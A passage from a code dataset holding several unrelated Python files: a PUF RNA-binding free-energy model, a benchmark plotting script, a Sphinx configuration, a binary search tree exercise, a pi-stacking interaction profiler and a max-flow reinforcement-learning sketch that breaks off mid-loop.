base_penalties--base penalties in partition function space (exp(-ddG_base/kT))\n # coupling_terms--coupling penalties in partition function space (exp(-ddG_base/kT))\n # sequence register that the mutational penalty contribution is being computed for\n # Output: ddG transformed into partition function space for passed sequence\n\n # Initialize to a penalty of 0 kcal: 10^(0) = 1; initialize to one in partition function space\n ddG = 1\n # Iterate through base penalties\n for i, base in enumerate(sequence):\n if i==8 and sequence[7]!='A':\n # exception at position 8--nothing happens\n continue\n ddG = ddG*base_penalties_exp.loc[i, base]\n\n # Apply coupling corrections\n if first_coupling:\n if ((sequence[4] == 'U' or sequence[4] == 'C') and\n sequence[5] == 'A' and\n sequence[6] == 'G' and\n sequence[7] != 'A'):\n ddG = ddG*coupling_terms_exp.loc['c1']\n if second_coupling:\n if sequence[6] == 'C' and sequence[7] != 'A':\n ddG = ddG*coupling_terms_exp.loc['c2']\n\n return ddG\n\ndef compute_ensemble_ddG_set(single_dG_values, 
temperature):\n \"\"\"Same as below but better starting with an array. Also assumes inputs are in dG,\n not in 'partition function space'\"\"\"\n ddG_conversion_factor = get_ddG_conversion(temperature)\n return ddG_conversion_factor*np.log(np.exp(single_dG_values/ddG_conversion_factor).sum(axis=1))\n \n\n\ndef compute_ensemble_ddG(single_dG_values, temperature, needs_exponentiating=False):\n # sums the individual contributions ot the partition function to get the compute partition \n # function and then converts that into a ddG for the ensemble\n # Inputs:\n # single_dG_values--a list of the single contributions to the partition function from all possible registers\n # Outputs:\n # final_ddG--final ddG of the ensemble\n ddG_conversion_factor = get_ddG_conversion(temperature)\n\n if needs_exponentiating:\n single_dG_values = np.exp(single_dG_values/ddG_conversion_factor).copy()\n\n # Sum the logged ddG values to compute the partition function \n partition_function = np.sum(single_dG_values)\n\n # Convert the partition function to the ensemble free energy\n \n final_ddG = ddG_conversion_factor*np.log(partition_function)\n\n return final_ddG\n\ndef get_coupling_bool_term1(flip_pos):\n # oonly apply the first coupling term if there is no flip at position 4, 5\n if flip_pos==4 or flip_pos==5:\n return False\n else:\n return True\n \ndef get_coupling_bool_term2(flip_pos):\n # oonly apply the second coupling term if there is no flip at position 5\n if flip_pos==5:\n return False\n else:\n return True\n\ndef get_noflip_registers(sequence, base_penalties, coupling_params):\n \"\"\"for a sequence, find the ddGs for each 1 nt register of the no-flip binding configuration.\"\"\"\n seq_length = 9\n registers = {}\n for i in range(len(sequence)-seq_length+1):\n ddG = perfect_match_ddG_coupling_terms(sequence[i:i+seq_length], base_penalties, coupling_params, True, True)\n registers[('%d:%d'%(i, i+seq_length), '-')] = ddG\n registers = pd.Series(registers)\n return registers\n\ndef get_1flip_registers(sequence, base_penalties, coupling_params, flip_params):\n \"\"\"for a sequence, find the ddGs for each 1 nt register of the 1nt-flip binding configuration.\"\"\"\n possible_flip_positions = flip_params.index.tolist()\n seq_length = 10\n registers = {}\n for i in range(len(sequence)-seq_length+1):\n current_sequence = sequence[i:i+seq_length]\n for flip_pos in possible_flip_positions:\n seq_not_flipped = current_sequence[:flip_pos]+current_sequence[flip_pos+1:]\n flip_base = current_sequence[flip_pos]\n\n dG = (flip_params.loc[flip_pos, flip_base] + # this is the penalty of flipping the residue\n perfect_match_ddG_coupling_terms(seq_not_flipped, base_penalties, coupling_params,\n get_coupling_bool_term1(flip_pos),\n get_coupling_bool_term2(flip_pos)))\n registers[('%d:%d'%(i, i+seq_length), 'pos%d_1nt'%flip_pos)] = dG\n registers = pd.Series(registers)\n return registers\n\ndef get_2flip_registers(sequence, base_penalties, coupling_params, flip_params, double_flip_params):\n \"\"\"for a sequence, find the ddGs for each 1 nt register of the 2nt-flip binding configuration.\"\"\"\n # double flips\n possible_flip_positions = flip_params.index.tolist()\n possible_double_flip_pos = double_flip_params.index.tolist()\n seq_length = 11\n registers = {}\n for i in range(len(sequence)-seq_length+1):\n current_sequence = sequence[i:i+seq_length]\n \n # 2x1nt flips\n for flip_pos1, flip_pos2 in itertools.combinations(possible_flip_positions, 2):\n \n # if the two positions are right next to each other, don't include here 
because these are the same as double flips\n if np.abs(flip_pos1 - flip_pos2) <= 1:\n continue\n \n seq_not_flipped = current_sequence[:flip_pos1]+current_sequence[flip_pos1+1:flip_pos2] + current_sequence[flip_pos2+1:]\n flip_base1 = current_sequence[flip_pos1]\n flip_base2 = current_sequence[flip_pos2]\n\n dG = (flip_params.loc[flip_pos1, flip_base1] + # this is the penalty of flipping the residue 1\n flip_params.loc[flip_pos2, flip_base2] + # this is the penalty of flipping the residue 2\n perfect_match_ddG_coupling_terms(seq_not_flipped, base_penalties, coupling_params,\n get_coupling_bool_term1(flip_pos1) and get_coupling_bool_term1(flip_pos2),\n get_coupling_bool_term2(flip_pos1) and get_coupling_bool_term2(flip_pos2)))\n \n \n registers[('%d:%d'%(i, i+seq_length), 'pos%d_1nt;pos%d_1nt'%(flip_pos1, flip_pos2))] = dG\n\n \n # 1x2nt flips\n for flip_pos in possible_double_flip_pos:\n\n seq_not_flipped = current_sequence[:flip_pos]+current_sequence[flip_pos+2:]\n dG = (double_flip_params.loc[flip_pos] +\n perfect_match_ddG_coupling_terms(seq_not_flipped, base_penalties, coupling_params,\n get_coupling_bool_term1(flip_pos),\n get_coupling_bool_term2(flip_pos)))\n \n registers[('%d:%d'%(i, i+seq_length), 'pos%d_2nt'%(flip_pos))] = dG\n\n registers = pd.Series(registers)\n return registers\n\n\ndef get_start_and_stop(seq_length, interval_length, i):\n \"\"\"Return the stop and start around nt i.\"\"\"\n start = max(i-interval_length+1, 0)\n stop = min(i+1, seq_length - interval_length+1)\n return start, stop\n \ndef find_energy_for_1nt_sequence_registers(sequence, base_penalties, coupling_params, flip_params, double_flip_params, temperature):\n \"\"\"Find the ensemble energy for each 1 nt register\"\"\"\n linear_binding_ddGs = get_noflip_registers(sequence, base_penalties, coupling_params)\n oneflip_binding_ddGs = get_1flip_registers(sequence, base_penalties, coupling_params, flip_params)\n twoflip_binding_ddGs = get_2flip_registers(sequence, base_penalties, coupling_params, flip_params, double_flip_params)\n seq_length_linear = 9\n seq_length_oneflip = 10\n seq_length_twoflip = 11\n \n ddGs_final = {}\n for i in range(len(sequence)):\n ddGs = {}\n \n # linear binding\n #if seq_length_linear > seq_length_interval:\n # raise ValueError('sequence is too short')\n\n start, stop = get_start_and_stop(len(sequence), seq_length_linear, i)\n for j in range(start, stop):\n key = '%d:%d'%(j, j+seq_length_linear)\n ddGs[key] = linear_binding_ddGs.loc[key]\n \n \n start, stop = get_start_and_stop(len(sequence), seq_length_oneflip, i)\n for j in range(start, stop):\n key = '%d:%d'%(j, j+seq_length_oneflip)\n ddGs[key] = oneflip_binding_ddGs.loc[key]\n \n start, stop = get_start_and_stop(len(sequence), seq_length_twoflip, i)\n for j in range(start, stop):\n key = '%d:%d'%(j, j+seq_length_twoflip)\n ddGs[key] = twoflip_binding_ddGs.loc[key] \n\n try:\n ddGs = pd.concat(ddGs)\n except ValueError:\n ipdb.set_trace()\n # combine into a single ensemble ddG\n ddG = compute_ensemble_ddG(ddGs, temperature, needs_exponentiating=True)\n ddGs_final[i] = ddG\n \n return pd.Series(ddGs_final) \n \n\ndef find_energy_for_11nt_sequence_registers(sequence, base_penalties, coupling_params, flip_params, double_flip_params, temperature):\n \"\"\"Find the ensemble energy for each register\"\"\"\n linear_binding_ddGs = get_noflip_registers(sequence, base_penalties, coupling_params)\n oneflip_binding_ddGs = get_1flip_registers(sequence, base_penalties, coupling_params, flip_params)\n twoflip_binding_ddGs = 
get_2flip_registers(sequence, base_penalties, coupling_params, flip_params, double_flip_params)\n \n # each register in twoflip_binding_ddGs corresponds to two in oneflip and 3 in noflip\n seq_length_interval = min(11, len(sequence))\n seq_length_linear = 9\n seq_length_oneflip = 10\n seq_length_twoflip = 11\n ddGs_final = {}\n for i in range(len(sequence)-seq_length_interval+1):\n ddGs = {}\n \n # linear binding\n if seq_length_linear > seq_length_interval:\n raise ValueError('sequence is too short')\n \n for j in range(seq_length_interval-seq_length_linear+1):\n key = '%d:%d'%(i+j, i+j+seq_length_linear)\n ddGs[key] = linear_binding_ddGs.loc[key]\n \n # one flip binding\n if seq_length_oneflip <= seq_length_interval: \n for j in range(seq_length_interval-seq_length_oneflip+1):\n key = '%d:%d'%(i+j, i+j+seq_length_oneflip)\n ddGs[key] = oneflip_binding_ddGs.loc[key]\n \n # two flip binding\n if seq_length_twoflip <= seq_length_interval: \n for j in range(seq_length_interval-seq_length_twoflip+1):\n key = '%d:%d'%(i+j, i+j+seq_length_twoflip)\n ddGs[key] = twoflip_binding_ddGs.loc[key]\n \n ddGs = pd.concat(ddGs)\n # combine into a single ensemble ddG\n ddG = compute_ensemble_ddG(ddGs, temperature, needs_exponentiating=True)\n ddGs_final[int(i+np.floor(seq_length_interval/2.))] = ddG\n \n return pd.Series(ddGs_final)\n\ndef additive_PUF_flip_model(passed_sequence, flip_params, base_penalties, coupling_params, double_flip_params, temperature, return_ensemble=False):\n # Inputs\n # passed sequence--sequence to compute the affinity for\n # flip_params--list of single flip param penalties (listed as 3/4A, 3/4C, 3/4G, 3/4U, 4/5A, ...)\n # base_penalties--list of single mutation penalties (listed as 1A, 1C, 1G, 1U, 2A, ...)\n # double_flip_params--list of double flip penalties (listed as 3 double flip, 4 double flip, ...)\n # coupling_params--list of coupling adjustments(listed as 7G adjustment followed by 7C adjustment)\n # Outputs\n # ddG predicted for the pased sequence in kcal/mol\n\n # Compute conversion factor at given Temperature (-T*k*(factor to convert exp to base 10))\n ddG_conversion_factor = get_ddG_conversion(temperature)\n\n # convert penalties from ddG space to \"partition function\" space (should be ordered A, C, G, T)\n flip_params_exp = np.exp(flip_params/ddG_conversion_factor)\n double_flip_params_exp = np.exp(double_flip_params/ddG_conversion_factor)\n base_penalties_exp = np.exp(base_penalties/ddG_conversion_factor)\n coupling_params_exp = np.exp(coupling_params/ddG_conversion_factor)\n\n possible_flip_positions = flip_params_exp.index.tolist()\n possible_double_flip_pos = double_flip_params_exp.index.tolist()\n \n # Convert sequence to a list for easy indexing\n sequence = list(passed_sequence)\n\n # initialize a list to store affinity for each possible register (note that this will store not true ddG values, but ddG values in \"partition function\" space)\n #length_9_ddGs = get_length9_registers(sequence, base_penalties_exp, coupling_params_exp)\n single_ddG_values = []\n registers = []\n for i in range(len(sequence)-8):\n single_ddG_values.append(perfect_match_exp_ddG_coupling_terms(sequence[i:i+9], base_penalties_exp, coupling_params_exp, True, True))\n registers.append('noflip_%d'%i)\n \n # compute the 1 nt flip ddG values\n for i in range(len(sequence)-9):\n current_sequence = sequence[i:i+10]\n for flip_pos in possible_flip_positions:\n seq_not_flipped = current_sequence[:flip_pos]+current_sequence[flip_pos+1:]\n flip_base = current_sequence[flip_pos]\n\n dG = 
(flip_params_exp.loc[flip_pos, flip_base]* # this is the penalty of flipping the residue\n perfect_match_exp_ddG_coupling_terms(seq_not_flipped, base_penalties_exp, coupling_params_exp,\n get_coupling_bool_term1(flip_pos),\n get_coupling_bool_term2(flip_pos)))\n single_ddG_values.append(dG)\n registers.append('flip_%d;pos_%d'%(i, flip_pos))\n \n # double flips\n for i in range(len(sequence)-10):\n current_sequence = sequence[i:i+11]\n \n # 2x1nt flips\n for flip_pos1, flip_pos2 in itertools.combinations(possible_flip_positions, 2):\n seq_not_flipped = current_sequence[:flip_pos1]+current_sequence[flip_pos1+1:flip_pos2] + current_sequence[flip_pos2+1:]\n flip_base1 = current_sequence[flip_pos1]\n flip_base2 = current_sequence[flip_pos2]\n\n dG = (flip_params_exp.loc[flip_pos1, flip_base1]* # this is the penalty of flipping the residue 1\n flip_params_exp.loc[flip_pos2, flip_base2]* # this is the penalty of flipping the residue 2\n perfect_match_exp_ddG_coupling_terms(seq_not_flipped, base_penalties_exp, coupling_params_exp,\n get_coupling_bool_term1(flip_pos1) and get_coupling_bool_term1(flip_pos2),\n get_coupling_bool_term2(flip_pos1) and get_coupling_bool_term2(flip_pos2)))\n single_ddG_values.append(dG)\n registers.append('doubleflip_%d;pos_%d;pos_%d'%(i, flip_pos1, flip_pos2))\n \n # 1x2nt flips\n for flip_pos in possible_double_flip_pos:\n\n seq_not_flipped = current_sequence[:flip_pos]+current_sequence[flip_pos+2:]\n dG = (double_flip_params_exp.loc[flip_pos]*\n perfect_match_exp_ddG_coupling_terms(seq_not_flipped, base_penalties_exp, coupling_params_exp,\n get_coupling_bool_term1(flip_pos),\n get_coupling_bool_term2(flip_pos)))\n single_ddG_values.append(dG)\n registers.append('doubleflip_%d;pos_%d'%(i, flip_pos))\n\n ddG = compute_ensemble_ddG(single_ddG_values, temperature)\n \n if return_ensemble:\n return ddG, pd.Series(ddG_conversion_factor*np.log(single_ddG_values), index=registers)\n else:\n return ddG\n\ndef interpret_col_names(col_names):\n \"\"\" given the 'register' annotations above, group them more meaningfully\"\"\"\n annotations = pd.Series(1, index=col_names)\n annotations.loc[[idx for idx in col_names if idx.find('noflip')==0 and idx!='noflip_0']] = 2\n annotations.loc[[idx for idx in col_names if idx.find('flip')==0]] = 4\n annotations.loc[[idx for idx in col_names if idx.find('doubleflip')==0]] = 8\n\n return annotations\n\ndef flag_ensemble(ddG_ensemble_vec, cutoff=1):\n \"\"\"Given a set of measurements, find things within cutoff and generate flag with annotations\"\"\"\n close_enough_vec = [idx for idx, val in ddG_ensemble_vec.iteritems() if val < cutoff]\n annotations = interpret_col_names(ddG_ensemble_vec.index.tolist())\n flag = annotations.loc[close_enough_vec].unique().sum()\n return flag\n \ndef determine_seq_occupancy(seq, temperature):\n \"\"\"Break a seq up into 11 nt chunks and return occupancy relative to consensus site for each seq.\"\"\"\n \n","sub_path":"puflibs/seqmodel_old.py","file_name":"seqmodel_old.py","file_ext":"py","file_size_in_byte":19521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"331283559","text":"import argparse\nimport os\nimport distutils.util\nimport sys\n\nfrom collections import defaultdict\n\n# import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom matplotlib import transforms\n\nfrom __plot_utils import create_scaled_canvases, load_results, 
process_cli_args\n\nsys.path.append(os.path.normpath(os.path.join(__file__, \"../../../\"))) # noqa\nfrom experimentarium.utils import make_iter\n\nsns.set()\n\n\nDEFAULT_RESULTS_ROOT = os.path.normpath(\n os.path.join(os.path.dirname(__file__), \"../../../merged_results\")\n)\n\nDEFAULT_OUT_ROOT = os.path.normpath(\n os.path.join(os.path.dirname(__file__), \"../../../plots\")\n)\n\n\nif __name__ == \"__main__\":\n # ======================================================================\n # Parser setting up.\n # ======================================================================\n\n parser = argparse.ArgumentParser(\n \"Plotter\", formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n \"--results-root\",\n type=str,\n help=\"Path to merged results or directory with files to merge\",\n )\n parser.add_argument(\"--out-root\", type=str, help=\"Directory to save plots\")\n parser.add_argument(\n \"--last\",\n type=distutils.util.strtobool,\n help=\"Whether to take the last created file if --results-root is directory\",\n )\n parser.add_argument(\"--extention\", type=str, help=\"Extention of saved plots\")\n parser.add_argument(\"--metrics\", type=str, nargs=\"+\", help=\"Metrics to plot\")\n parser.add_argument(\n \"--hard-tresholding\",\n type=distutils.util.strtobool,\n help=\"Whether not to display models with scores less than threshold\",\n )\n parser.add_argument(\n \"--threshold\",\n type=float,\n help=\"Threshold to set for soft and hard thresholding\",\n )\n parser.add_argument(\n \"--progress-bar\",\n type=distutils.util.strtobool,\n help=\"Whether to show progress bar over processed benchmarks\",\n )\n parser.add_argument(\n \"--benchmarks\", type=str, nargs=\"*\", help=\"Which benchmarks to plot\",\n )\n parser.add_argument(\n \"--joint-plots\",\n type=distutils.util.strtobool,\n help=\"Whether to plot joint plots. 
False means plotting only sl/ssl plots\",\n )\n parser.add_argument(\n \"--max-diff-display\",\n type=float,\n help=\"Maximum absolute value on difference score plots\",\n )\n\n parser.set_defaults(\n results_root=DEFAULT_RESULTS_ROOT,\n out_root=DEFAULT_OUT_ROOT,\n last=\"True\",\n extention=\"png\",\n metrics=[\"accuracy\", \"f1\"],\n hard_thresholding=\"True\",\n threshold=0.5,\n progress_bar=\"True\",\n benchmarks=[\"all\"],\n joint_plots=\"True\",\n max_diff_display=0.04,\n )\n args = parser.parse_args()\n process_cli_args(args)\n\n # ======================================================================\n # Plotting things.\n # ======================================================================\n df = load_results(args)\n args.benchmarks.intersection_update(pd.unique(df[\"benchmark\"]))\n df = df[df[\"benchmark\"].isin(args.benchmarks)]\n\n if not args.benchmarks:\n raise ValueError(f\"None of provided benchmarks is found in loaded data.\")\n\n metrics = list(set(df.columns).intersection(set(args.metrics)))\n if not metrics:\n raise ValueError(\"No given metric found in merged dataframe.\")\n\n models = tuple(pd.unique(df[\"model\"]))\n # markers = tuple(\n # marker\n # for marker in matplotlib.markers.MarkerStyle.markers\n # if marker not in {\",\", \"\", \" \", \"None\", None}\n # )\n markers = (\"s\", \"o\", \"v\", \"X\")\n colors = sns.color_palette(\"muted\")\n\n model2marker = dict(zip(models, markers))\n model2color = dict(zip(models, colors))\n\n linestyle2ssl = {True: \"-\", False: \"-.\"}\n marker2ssl = {True: \"P\", False: \"o\"}\n\n # Lsize/Ratio -> Metrics -> Benchmark -> Model -> Score\n diffs = defaultdict(lambda: defaultdict(lambda: defaultdict(dict)))\n\n # ======================================================================\n # Plotting joint results.\n # ======================================================================\n\n for benchmark, benchmark_df in make_iter(\n df.groupby(\"benchmark\"),\n args.progress_bar,\n desc=\"#Benchmarks processed/joint plots plotted\",\n ):\n if args.joint_plots:\n canvases = create_scaled_canvases(\n metrics, benchmark, [\"Accuracy\", \"F1 score\"]\n )\n\n for model, model_df in benchmark_df.groupby(\"model\"):\n ratios = pd.unique(model_df[\"ratio\"])\n lsizes = pd.unique(model_df[\"lsize\"])\n scale = lsizes[0] / ratios[0]\n\n # Some model may not have a baseline, but to build difference plot there are\n # needed both.\n add_to_diff = len(pd.unique(model_df[\"is_ssl\"])) == 2\n is_ssl_groupby = model_df.groupby(\"is_ssl\")\n\n if add_to_diff:\n diff_scores = np.subtract(\n *[\n np.maximum(_df[metrics].to_numpy(), 0.5)\n for _, _df in is_ssl_groupby\n ]\n )\n\n for is_ssl, is_ssl_df in is_ssl_groupby:\n\n for i, metric in enumerate(metrics):\n\n scores = np.maximum(is_ssl_df[metric].to_numpy(), 0.5)\n mask = scores > args.threshold\n if args.hard_tresholding and np.any(mask == False): # noqa\n mask = np.zeros_like(mask, dtype=np.bool)\n\n if np.any(mask == True): # noqa\n masked_ratios = ratios[mask]\n masked_scores = scores[mask]\n\n if args.joint_plots:\n canvases[metric].ax.plot(\n masked_ratios,\n masked_scores,\n label=\"{}, {}\".format(\n model.upper(), \"SSL\" if is_ssl else \"Baseline\"\n ),\n color=model2color[model],\n marker=marker2ssl[is_ssl],\n linestyle=linestyle2ssl[is_ssl],\n )\n canvases[metric].rescale(scale)\n\n if add_to_diff:\n for ratio, score, diff_score in zip(\n masked_ratios, masked_scores, diff_scores[mask, i]\n ):\n diffs[ratio][metric][benchmark][model] = diff_score\n\n if args.joint_plots:\n 
benchmark_root = os.path.join(args.out_root, \"joint_plots\", benchmark)\n try:\n os.makedirs(benchmark_root)\n except FileExistsError:\n pass\n\n for metric in metrics:\n canvases[metric].fig.savefig(\n os.path.join(benchmark_root, f\"{metric}.{args.extention}\")\n )\n plt.close(\"all\")\n\n # ======================================================================\n # Plotting score difference.\n # ======================================================================\n diff_out_root = os.path.join(args.out_root, \"score_difference\")\n max_diff_display = args.max_diff_display\n\n # Lsize/Ratio -> Metrics -> Benchmark -> Model -> Score\n def set_label(labelled_models: set, model: str) -> dict:\n if model in labelled_models:\n return dict()\n return dict(label=model)\n\n def sign2color(score: float) -> str:\n if score == 0:\n return \"black\"\n elif score > 0:\n return \"green\"\n return \"red\"\n\n # https://stackoverflow.com/a/43130355\n def offset(p):\n return transforms.ScaledTranslation(p / 72.0, 0, plt.gcf().dpi_scale_trans)\n\n handles = dict()\n marker_size = 60\n variance = 10\n figsize = (15, 15)\n\n for lsize, mapping in make_iter(\n diffs.items(), args.progress_bar, desc=\"#Difference plots plotted\"\n ):\n lsize_root = os.path.join(\n diff_out_root, f\"lsize_{str(lsize).replace('.', '_')}\"\n )\n try:\n os.makedirs(lsize_root)\n except FileExistsError:\n pass\n for metric, mapping_ in mapping.items():\n labelled_models = set()\n fig, ax = plt.subplots(figsize=figsize)\n trans_data = plt.gca().transData\n ax.tick_params(axis=\"x\", labelrotation=45)\n ax.set_title(f\"{metric} difference at ratio {lsize}\")\n ax.set_ylabel(f\"Difference\")\n for benchmark, mapping__ in mapping_.items():\n for idx, (model, score) in enumerate(mapping__.items()):\n if score <= -max_diff_display:\n score = -max_diff_display - 1e-3\n elif score >= max_diff_display:\n score = max_diff_display + 1e-3\n ax.scatter(\n benchmark,\n score,\n marker=model2marker[model],\n color=sign2color(score),\n edgecolor=\"black\",\n **set_label(labelled_models, model),\n s=marker_size,\n alpha=0.75,\n transform=trans_data\n + offset(variance * ((idx + 1) // 2) * (-1) ** idx),\n )\n if not handles.get(model):\n handles[model] = plt.scatter(\n [],\n [],\n marker=model2marker[model],\n color=\"None\",\n edgecolor=\"black\",\n label=model,\n )\n labelled_models.add(model)\n ax.axhline(max_diff_display, linestyle=\"--\")\n ax.axhline(-max_diff_display, linestyle=\"--\")\n ax.legend(\n handles=list(handles.values()),\n numpoints=1,\n bbox_to_anchor=(1.1, 0.5),\n borderaxespad=0,\n )\n fig.savefig(os.path.join(lsize_root, f\"{metric}.{args.extention}\"))\n plt.close(\"all\")\n","sub_path":"experimentarium/tools/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"306672684","text":"\"\"\"\n Options for sphinx\n Add project specific options to conf.py in the root folder\n\"\"\"\nimport sphinx_rtd_theme\nimport os\n\nthis_dir = os.path.abspath(os.path.dirname(__file__))\nsupport_dir = os.path.join(this_dir, \"..\", \"support\")\n\nextensions = ['sphinx.ext.autodoc']\n\nhtml_theme = 'the_theme'\nhtml_theme_path = [os.path.join(support_dir, 'templates'), sphinx_rtd_theme.get_html_theme_path()]\nhtml_static_path = [os.path.join(support_dir, \"static\"), os.path.join(sphinx_rtd_theme.get_html_theme_path(), \"sphinx_rtd_theme\", \"static\")]\n\nexclude_patterns = []\n\nmaster_doc = 
'index'\nsource_suffix = '.rst'\n\npygments_style = 'pastie'\n\n# Add options specific to this project\nlocation = os.path.join(this_dir, '../conf.py')\nwith open(location) as f:\n code = compile(f.read(), location, 'exec')\n exec(code, globals(), locals())\n","sub_path":"docs/docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"133430762","text":"# -*- coding: utf-8 -*-\n\n\nclass Node:\n def __init__(self, data=None, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\n def __str__(self):\n return str(self.data)\n\n def insert(self, data):\n if self.data < data:\n if self.right:\n self.right.insert(data)\n else:\n self.right = Node(data)\n elif self.data > data:\n if self.left:\n self.left.insert(data)\n else:\n self.left = Node(data)\n else:\n pass\n\n def count(self):\n counter = 1\n if self.left:\n counter += self.left.count()\n if self.right:\n counter += self.right.count()\n return counter\n\n def search(self, data):\n if self.data == data:\n return True\n if data < self.data:\n if self.left:\n return self.left.search(data)\n else:\n if self.right:\n return self.right.search(data)\n return False\n\ndef max_bst(top):\n if not top:\n raise Exception(\"Drzewo puste\")\n max_found = top.data\n if top.right:\n max_found = max(max_bst(top.right),max_found)\n if top.left:\n max_found = max(max_bst(top.left),max_found)\n return max_found\n\ndef min_bst(top):\n if not top:\n raise Exception(\"Drzewo puste\")\n min_found = top.data\n if top.right:\n min_found = min(min_bst(top.right),min_found)\n if top.left:\n min_found = min(min_bst(top.left),min_found)\n return min_found\n \nroot = None\ntry:\n min_bst(None)\nexcept Exception:\n print(\"puste drzewo\")\n\n\nroot = Node(23)\nroot.insert(1)\nroot.insert(12)\nroot.insert(1224)\nroot.insert(828)\nroot.insert(123)\nroot.insert(234)\nroot.insert(5212)\nroot.insert(1)\n\nprint(\"Wartość największa: \"+str(max_bst(root)))\nprint(\"Wartość najmniejsza: \"+str(min_bst(root)))","sub_path":"zestaw-9/908.py","file_name":"908.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"384923174","text":"from statistics import mean\nfrom sys import stdin\n\nstudents = {}\nnext(stdin)\nfor line in stdin:\n try:\n name, *marks = line.split()\n students[name] = mean(map(float, marks))\n except ValueError:\n print('{:.2f}'.format(students[line.rstrip()]))\n","sub_path":"Python/Introduction/finding_the_percentage.py","file_name":"finding_the_percentage.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"2606881","text":"import os.path as osp\nimport pickle\n\nimport mastic.interactions.pi_stacking as pinx\nimport mastic.interactions.hydrogen_bond as hinx\n\nwork_dir = \"/home/salotz/Dropbox/devel/mastic/work/pi_stacking\"\n\n# load the SystemType\nbenzene_system_pkl_path = osp.join(work_dir, \"Benzene_Benzene_SystemType.pkl\")\nwith open(benzene_system_pkl_path, 'rb') as rf:\n Benzene_Benzene_SystemType = pickle.load(rf)\n\n# load the coordinates for the reference benzene\nref_benzene_PDB_path = osp.join(work_dir, \"ref_benzene.pdb\")\n\nfrom rdkit import Chem\n\nref_benzene_rdkit = Chem.MolFromPDBFile(ref_benzene_PDB_path, removeHs=False, sanitize=False)\n\nfrom mastic.interfaces.rdkit import 
RDKitMoleculeWrapper\n\nbenzene_rdkit_wrapper = RDKitMoleculeWrapper(ref_benzene_rdkit, mol_name=\"benzene\")\n\nref_benzene_coords = benzene_rdkit_wrapper.get_conformer_coords(0)\n\nfrom mastic.interactions.pi_stacking import PiStackingType\n\n# get the interaction space for pi-stacking\npistack_inx_classes = Benzene_Benzene_SystemType.interaction_space([(0,1)], PiStackingType)[(0,1)]\n\n# profile the stacked one that should qualify\nstacked_member_coords = [ref_benzene_coords, test_benzenes['stacked']]\nstacked_system = Benzene_Benzene_SystemType.to_system(stacked_member_coords)\n\n# profile the interactions between the two rings\nstacked_inxs = stacked_system.associations[0].\\\n profile_interactions([PiStackingType],\n interaction_classes=pistack_inx_classes)\\\n [PiStackingType]\n\n# substantiate the systems and profile each one\ntest_inxs = {}\ntest_failed_hits = {}\nfor test_name, test_benzene in test_benzenes.items():\n member_coords = [ref_benzene_coords, test_benzene]\n system = Benzene_Benzene_SystemType.to_system(member_coords)\n\n # profile the interactions between the two rings\n failed_hits, all_inxs = system.associations[0].\\\n profile_interactions([PiStackingType],\n interaction_classes=pistack_inx_classes,\n return_failed_hits=True)\n inxs = all_inxs[PiStackingType]\n test_failed_hits[test_name] = failed_hits\n test_inxs[test_name] = inxs\n","sub_path":"work/pi_stacking/profile_test_cases.py","file_name":"profile_test_cases.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"363712696","text":"import numpy as np\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport start\n\nclass flow_graph():\n def __init__(self, graph):\n self.graph = graph\n for i in range(len(self.graph[0])):\n for j in range(len(self.graph[0])):\n if j == len(self.graph[0])-1:\n self.graph[i][j] = 1\n else:\n if self.graph[i][j] == 0:\n self.graph[i][j] = -1\n else:\n self.graph[i][j] = 0\n self.net_flow = [0]*len(graph[0])\n self.source = 0\n self.sink = len(graph[0])-1\n self.current = source\n self.score = np.infty\n\n def getState(self):\n return self.graph\n\n def getMove(self, action):\n if self.current == self.sink:\n return self.score\n move = int(action*len(self.graph[0]))\n if self.graph[self.current][move] == 0:\n return -100\n else:\n self.score = min(self.score, self.graph[self.current][move])\n self.current = move\n return -1 \n\nclass agent():\n def __init__(self, lr, gamma, graph):\n self.gamma = gamma\n self.reward_graph = graph\n self.q = np.zeros([10, 10])\n self.current = 0\n self.sink = 9\n\n def update(self):\n end = False\n v = 0\n while not end:\n valid = False\n check = 0\n for j in range(10):\n if self.reward_graph[self.current][j] > -1:\n check+=1\n if check == 0:\n return -1\n while not valid:\n i = np.random.randint(0, 10)\n if self.reward_graph[self.current][i] > -1:\n valid = True\n maxq = 0\n v+=1\n for j in range(10):\n if self.reward_graph[i][j] > -1:\n if self.q[i][j] > maxq:\n maxq = self.q[i][j]\n self.q[self.current][i] = self.reward_graph[self.current][i]+self.gamma*maxq\n if i == self.sink:\n end = True\n else:\n self.current = i\n if v > 10:\n end = True\n\nepisodes = 500\nex_graph_1 = start.generate_random_graph(10, 0.4, 15)\nprint(start.edmonds_karp(ex_graph_1))\ndone = False\nmaxf = 0\nwhile not done:\n graph = np.zeros([10, 10])\n for i in range(len(graph[0])):\n for j in range(len(graph[0])):\n if ex_graph_1[i][j] > 0:\n if j == 9:\n 
